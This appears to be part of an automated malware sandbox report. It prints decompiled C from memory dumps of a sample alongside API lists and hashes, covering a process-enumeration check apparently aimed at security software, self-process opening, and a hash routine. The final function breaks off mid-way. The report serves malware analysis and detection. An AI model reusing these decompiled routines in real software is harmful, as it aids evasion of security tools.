                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                              • Opcode ID: dd8d459585984a1f31cb7852512ec21afb8e2dd764ec7da492c03e5d37f36680
                                                                                                                                                                                              • Instruction ID: 6c8b5a5218ed757da67779d42163800d62aa0c8238bb6d792c30fa86ec4f71ff
                                                                                                                                                                                              • Opcode Fuzzy Hash: dd8d459585984a1f31cb7852512ec21afb8e2dd764ec7da492c03e5d37f36680
                                                                                                                                                                                              • Instruction Fuzzy Hash: EEF03CB5C01218EFDB00DB98C588AFDB7B8EF04344F1580AAE606A3240D7B45B85CF62
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF60CF(void* __edx, void* __edi, void* _a4) {
                                                                                                                                                                                              				int _t7;
                                                                                                                                                                                              				int _t13;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t7 = E00DF7A28(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                              				_t13 = _t7;
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					memcpy(__edi, _a4, _t13);
                                                                                                                                                                                              					 *((char*)(__edi + _t13)) = 0;
                                                                                                                                                                                              					E00DF147E(_a4);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t13;
                                                                                                                                                                                              			}





                                                                                                                                                                                              0x00df60db
                                                                                                                                                                                              0x00df60e0
                                                                                                                                                                                              0x00df60e4
                                                                                                                                                                                              0x00df60eb
                                                                                                                                                                                              0x00df60f6
                                                                                                                                                                                              0x00df60fa
                                                                                                                                                                                              0x00df60fa
                                                                                                                                                                                              0x00df6103

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF7A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 00DF7A5E
                                                                                                                                                                                                • Part of subcall function 00DF7A28: memset.NTDLL ref: 00DF7AD3
                                                                                                                                                                                                • Part of subcall function 00DF7A28: memset.NTDLL ref: 00DF7AE7
                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,00DF9F9F,?,?,00DF9C62,00000002,?,?,?), ref: 00DF60EB
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3053036209-0
                                                                                                                                                                                              • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                                                                                                                                                                              • Instruction ID: 60e4d99ee2f6d66662dca50877e491f13ab6bc72778c42fee7bca1704273458a
                                                                                                                                                                                              • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                                                                                                                                                                              • Instruction Fuzzy Hash: 91E08C7650012DB7CB222AA8EC01DFF7F5CDF52791F068024FF089A206DA25CA20A7F1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00DF56A2() {
                                                                                                                                                                                              				char _v264;
                                                                                                                                                                                              				void* _v300;
                                                                                                                                                                                              				int _t8;
                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t15 = 0;
                                                                                                                                                                                              				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                              				if(_t17 != 0) {
                                                                                                                                                                                              					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                              					while(_t8 != 0) {
                                                                                                                                                                                              						_t9 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              						_t2 = _t9 + 0xdfee38; // 0x73617661
                                                                                                                                                                                              						_push( &_v264);
                                                                                                                                                                                              						if( *0xdfd0fc() != 0) {
                                                                                                                                                                                              							_t15 = 1;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						CloseHandle(_t17);
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L8:
                                                                                                                                                                                              				return _t15;
                                                                                                                                                                                              			}









                                                                                                                                                                                              0x00df56ad
                                                                                                                                                                                              0x00df56b7
                                                                                                                                                                                              0x00df56bb
                                                                                                                                                                                              0x00df56c5
                                                                                                                                                                                              0x00df56f6
                                                                                                                                                                                              0x00df56cc
                                                                                                                                                                                              0x00df56d1
                                                                                                                                                                                              0x00df56de
                                                                                                                                                                                              0x00df56e7
                                                                                                                                                                                              0x00df56fe
                                                                                                                                                                                              0x00df56e9
                                                                                                                                                                                              0x00df56f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df56f1
                                                                                                                                                                                              0x00df56ff
                                                                                                                                                                                              0x00df5700
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df5700
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df56fa
                                                                                                                                                                                              0x00df5706
                                                                                                                                                                                              0x00df570b

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DF56B2
                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 00DF56C5
                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 00DF56F1
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DF5700
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                              • Opcode ID: 2946b701284ab00132dfb0a05fe7c2d2a76b2eefd90cf79b847093d2dc10969f
                                                                                                                                                                                              • Instruction ID: 367a8a35ad88015a5d8aac172eee25059c5ea6d22dc5dcb3e3c08375eabc3759
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2946b701284ab00132dfb0a05fe7c2d2a76b2eefd90cf79b847093d2dc10969f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F0F67650156CAAD720B626AC09DFB77EDDB85300F068051FB25C2145FA20C94686B5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00A8179C() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              				unsigned int _t3;
                                                                                                                                                                                              				void* _t4;
                                                                                                                                                                                              				long _t5;
                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                              				intOrPtr _t10;
                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t10 =  *0xa84130;
                                                                                                                                                                                              				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                              				 *0xa8413c = _t1;
                                                                                                                                                                                              				if(_t1 == 0) {
                                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t3 = GetVersion();
                                                                                                                                                                                              				if(_t3 != 5) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					if(_t14 <= 0) {
                                                                                                                                                                                              						_t4 = 0x32;
                                                                                                                                                                                              						return _t4;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if(_t3 >> 8 > 0) {
                                                                                                                                                                                              						L5:
                                                                                                                                                                                              						 *0xa8412c = _t3;
                                                                                                                                                                                              						_t5 = GetCurrentProcessId();
                                                                                                                                                                                              						 *0xa84128 = _t5;
                                                                                                                                                                                              						 *0xa84130 = _t10;
                                                                                                                                                                                              						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                              						 *0xa84124 = _t6;
                                                                                                                                                                                              						if(_t6 == 0) {
                                                                                                                                                                                              							 *0xa84124 =  *0xa84124 | 0xffffffff;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t14 = _t3 - _t3;
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}










                                                                                                                                                                                              0x00a8179d
                                                                                                                                                                                              0x00a817ab
                                                                                                                                                                                              0x00a817b1
                                                                                                                                                                                              0x00a817b8
                                                                                                                                                                                              0x00a8180f
                                                                                                                                                                                              0x00a8180f
                                                                                                                                                                                              0x00a817ba
                                                                                                                                                                                              0x00a817c2
                                                                                                                                                                                              0x00a817cf
                                                                                                                                                                                              0x00a817cf
                                                                                                                                                                                              0x00a8180b
                                                                                                                                                                                              0x00a8180d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a817c4
                                                                                                                                                                                              0x00a817cb
                                                                                                                                                                                              0x00a817d1
                                                                                                                                                                                              0x00a817d1
                                                                                                                                                                                              0x00a817d6
                                                                                                                                                                                              0x00a817e4
                                                                                                                                                                                              0x00a817e9
                                                                                                                                                                                              0x00a817ef
                                                                                                                                                                                              0x00a817f5
                                                                                                                                                                                              0x00a817fc
                                                                                                                                                                                              0x00a817fe
                                                                                                                                                                                              0x00a817fe
                                                                                                                                                                                              0x00a81808
                                                                                                                                                                                              0x00a817cd
                                                                                                                                                                                              0x00a817cd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a817cd
                                                                                                                                                                                              0x00a817cb

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00A811E0), ref: 00A817AB
                                                                                                                                                                                              • GetVersion.KERNEL32(?,00A811E0), ref: 00A817BA
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00A811E0), ref: 00A817D6
                                                                                                                                                                                              • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00A811E0), ref: 00A817EF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 845504543-0
                                                                                                                                                                                              • Opcode ID: c48bd213354a1933a1a4e0e60be09b910bcb470d25754ac76e1f233a6c9155c7
                                                                                                                                                                                              • Instruction ID: 3632dc126b45f5be0a029e5c8b581e0f932bc833fb14816a05a9823b8ff0d7ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: c48bd213354a1933a1a4e0e60be09b910bcb470d25754ac76e1f233a6c9155c7
                                                                                                                                                                                              • Instruction Fuzzy Hash: E2F06272A403169BDB20EBE9BC0D7553BB9A71DB12F100226E541D61E4F77085838F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                              			E00DF5920(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                                                              				void _v76;
                                                                                                                                                                                              				intOrPtr* _t226;
                                                                                                                                                                                              				signed int _t229;
                                                                                                                                                                                              				signed int _t231;
                                                                                                                                                                                              				signed int _t233;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				signed int _t237;
                                                                                                                                                                                              				signed int _t239;
                                                                                                                                                                                              				signed int _t241;
                                                                                                                                                                                              				signed int _t243;
                                                                                                                                                                                              				signed int _t245;
                                                                                                                                                                                              				signed int _t247;
                                                                                                                                                                                              				signed int _t249;
                                                                                                                                                                                              				signed int _t251;
                                                                                                                                                                                              				signed int _t253;
                                                                                                                                                                                              				signed int _t255;
                                                                                                                                                                                              				signed int _t257;
                                                                                                                                                                                              				signed int _t259;
                                                                                                                                                                                              				signed int _t338;
                                                                                                                                                                                              				signed char* _t348;
                                                                                                                                                                                              				signed int _t349;
                                                                                                                                                                                              				signed int _t351;
                                                                                                                                                                                              				signed int _t353;
                                                                                                                                                                                              				signed int _t355;
                                                                                                                                                                                              				signed int _t357;
                                                                                                                                                                                              				signed int _t359;
                                                                                                                                                                                              				signed int _t361;
                                                                                                                                                                                              				signed int _t363;
                                                                                                                                                                                              				signed int _t365;
                                                                                                                                                                                              				signed int _t367;
                                                                                                                                                                                              				signed int _t376;
                                                                                                                                                                                              				signed int _t378;
                                                                                                                                                                                              				signed int _t380;
                                                                                                                                                                                              				signed int _t382;
                                                                                                                                                                                              				signed int _t384;
                                                                                                                                                                                              				intOrPtr* _t400;
                                                                                                                                                                                              				signed int* _t401;
                                                                                                                                                                                              				signed int _t402;
                                                                                                                                                                                              				signed int _t404;
                                                                                                                                                                                              				signed int _t406;
                                                                                                                                                                                              				signed int _t408;
                                                                                                                                                                                              				signed int _t410;
                                                                                                                                                                                              				signed int _t412;
                                                                                                                                                                                              				signed int _t414;
                                                                                                                                                                                              				signed int _t416;
                                                                                                                                                                                              				signed int _t418;
                                                                                                                                                                                              				signed int _t420;
                                                                                                                                                                                              				signed int _t422;
                                                                                                                                                                                              				signed int _t424;
                                                                                                                                                                                              				signed int _t432;
                                                                                                                                                                                              				signed int _t434;
                                                                                                                                                                                              				signed int _t436;
                                                                                                                                                                                              				signed int _t438;
                                                                                                                                                                                              				signed int _t440;
                                                                                                                                                                                              				signed int _t508;
                                                                                                                                                                                              				signed int _t599;
                                                                                                                                                                                              				signed int _t607;
                                                                                                                                                                                              				signed int _t613;
                                                                                                                                                                                              				signed int _t679;
                                                                                                                                                                                              				void* _t682;
                                                                                                                                                                                              				signed int _t683;
                                                                                                                                                                                              				signed int _t685;
                                                                                                                                                                                              				signed int _t690;
                                                                                                                                                                                              				signed int _t692;
                                                                                                                                                                                              				signed int _t697;
                                                                                                                                                                                              				signed int _t699;
                                                                                                                                                                                              				signed int _t718;
                                                                                                                                                                                              				signed int _t720;
                                                                                                                                                                                              				signed int _t722;
                                                                                                                                                                                              				signed int _t724;
                                                                                                                                                                                              				signed int _t726;
                                                                                                                                                                                              				signed int _t728;
                                                                                                                                                                                              				signed int _t734;
                                                                                                                                                                                              				signed int _t740;
                                                                                                                                                                                              				signed int _t742;
                                                                                                                                                                                              				signed int _t744;
                                                                                                                                                                                              				signed int _t746;
                                                                                                                                                                                              				signed int _t748;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t226 = _a4;
                                                                                                                                                                                              				_t348 = __ecx + 2;
                                                                                                                                                                                              				_t401 =  &_v76;
                                                                                                                                                                                              				_t682 = 0x10;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                                                                                                                                                              					_t401 =  &(_t401[1]);
                                                                                                                                                                                              					_t348 =  &(_t348[4]);
                                                                                                                                                                                              					_t682 = _t682 - 1;
                                                                                                                                                                                              				} while (_t682 != 0);
                                                                                                                                                                                              				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                                                                              				_t683 =  *_t6;
                                                                                                                                                                                              				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                                                                              				_t402 =  *_t7;
                                                                                                                                                                                              				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                                                                              				_t349 =  *_t8;
                                                                                                                                                                                              				asm("rol eax, 0x7");
                                                                                                                                                                                              				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                                                                                                                                                              				asm("rol ecx, 0xc");
                                                                                                                                                                                              				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                                                                                                                                                              				asm("ror edx, 0xf");
                                                                                                                                                                                              				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                                                                                                                                                              				asm("ror esi, 0xa");
                                                                                                                                                                                              				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                                                                                                                                                              				_v8 = _t685;
                                                                                                                                                                                              				_t690 = _v8;
                                                                                                                                                                                              				asm("rol eax, 0x7");
                                                                                                                                                                                              				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                                                                                                                                                              				asm("rol ecx, 0xc");
                                                                                                                                                                                              				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                                                                                                                                                              				asm("ror edx, 0xf");
                                                                                                                                                                                              				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                                                                                                                                                              				asm("ror esi, 0xa");
                                                                                                                                                                                              				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                                                                                                                                                              				_v8 = _t692;
                                                                                                                                                                                              				_t697 = _v8;
                                                                                                                                                                                              				asm("rol eax, 0x7");
                                                                                                                                                                                              				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                                                                                                                                                              				asm("rol ecx, 0xc");
                                                                                                                                                                                              				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                                                                                                                                                              				asm("ror edx, 0xf");
                                                                                                                                                                                              				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                                                                                                                                                              				asm("ror esi, 0xa");
                                                                                                                                                                                              				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                                                                                                                                                              				_v8 = _t699;
                                                                                                                                                                                              				asm("rol eax, 0x7");
                                                                                                                                                                                              				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                                                                              				asm("rol ecx, 0xc");
                                                                                                                                                                                              				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                                                                                                                                                              				_t508 =  !_t357;
                                                                                                                                                                                              				asm("ror edx, 0xf");
                                                                                                                                                                                              				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                                                                                                                                                              				_v12 = _t410;
                                                                                                                                                                                              				_v12 =  !_v12;
                                                                                                                                                                                              				asm("ror esi, 0xa");
                                                                                                                                                                                              				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                                                                                                                                                              				asm("rol eax, 0x5");
                                                                                                                                                                                              				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                                                                                                                                                              				asm("rol ecx, 0x9");
                                                                                                                                                                                              				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                                                                                                                                                              				asm("rol edx, 0xe");
                                                                                                                                                                                              				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                                                                                                                                                              				asm("ror esi, 0xc");
                                                                                                                                                                                              				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                                                                                                                                                              				asm("rol eax, 0x5");
                                                                                                                                                                                              				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                                                                                                                                                              				asm("rol ecx, 0x9");
                                                                                                                                                                                              				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                                                                                                                                                              				asm("rol edx, 0xe");
                                                                                                                                                                                              				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                                                                                                                                                              				asm("ror esi, 0xc");
                                                                                                                                                                                              				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                                                                                                                                                              				asm("rol eax, 0x5");
                                                                                                                                                                                              				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                                                                                                                                                              				asm("rol ecx, 0x9");
                                                                                                                                                                                              				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                                                                                                                                                              				asm("rol edx, 0xe");
                                                                                                                                                                                              				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                                                                                                                                                              				asm("ror esi, 0xc");
                                                                                                                                                                                              				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                                                                                                                                                              				asm("rol eax, 0x5");
                                                                                                                                                                                              				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                                                                                                                                                              				asm("rol ecx, 0x9");
                                                                                                                                                                                              				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                                                                                                                                                              				asm("rol edx, 0xe");
                                                                                                                                                                                              				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                                                                                                                                                              				asm("ror esi, 0xc");
                                                                                                                                                                                              				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                                                                                                                                                              				asm("rol eax, 0x4");
                                                                                                                                                                                              				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                                                                                                                                                              				asm("rol ecx, 0xb");
                                                                                                                                                                                              				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                                                                                                                                                              				asm("rol edx, 0x10");
                                                                                                                                                                                              				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                                                                                                                                                              				_t599 = _t367 ^ _t420;
                                                                                                                                                                                              				asm("ror esi, 0x9");
                                                                                                                                                                                              				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                                                                                                                                                              				asm("rol eax, 0x4");
                                                                                                                                                                                              				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                                                                                                                                                              				asm("rol edi, 0xb");
                                                                                                                                                                                              				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                              				asm("rol edx, 0x10");
                                                                                                                                                                                              				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                                                                                                                                                              				_t338 = _t607 ^ _t422;
                                                                                                                                                                                              				asm("ror ecx, 0x9");
                                                                                                                                                                                              				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                                                                                                                                                              				asm("rol eax, 0x4");
                                                                                                                                                                                              				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                                                                                                                                                              				asm("rol esi, 0xb");
                                                                                                                                                                                              				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                                                                                                                                                              				asm("rol edi, 0x10");
                                                                                                                                                                                              				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                                                                                                                                                              				_t424 = _t734 ^ _t613;
                                                                                                                                                                                              				asm("ror ecx, 0x9");
                                                                                                                                                                                              				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                                                                                                                                                              				asm("rol eax, 0x4");
                                                                                                                                                                                              				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                                                                                                                                                              				asm("rol edx, 0xb");
                                                                                                                                                                                              				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                                                                                                                                                              				asm("rol esi, 0x10");
                                                                                                                                                                                              				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                                                                                                                                                              				asm("ror ecx, 0x9");
                                                                                                                                                                                              				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                                                                                                                                                              				asm("rol eax, 0x6");
                                                                                                                                                                                              				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                                                                                                                                                              				asm("rol edx, 0xa");
                                                                                                                                                                                              				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                                                                                                                                                              				asm("rol esi, 0xf");
                                                                                                                                                                                              				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                                                                                                                                                              				asm("ror ecx, 0xb");
                                                                                                                                                                                              				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                                                                                                                                                              				asm("rol eax, 0x6");
                                                                                                                                                                                              				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                                                                                                                                                              				asm("rol edx, 0xa");
                                                                                                                                                                                              				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                                                                                                                                                              				asm("rol esi, 0xf");
                                                                                                                                                                                              				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                                                                                                                                                              				asm("ror ecx, 0xb");
                                                                                                                                                                                              				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                                                                                                                                                              				asm("rol eax, 0x6");
                                                                                                                                                                                              				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                                                                                                                                                              				asm("rol edx, 0xa");
                                                                                                                                                                                              				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                                                                                                                                                              				asm("rol esi, 0xf");
                                                                                                                                                                                              				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                                                                                                                                                              				asm("ror edi, 0xb");
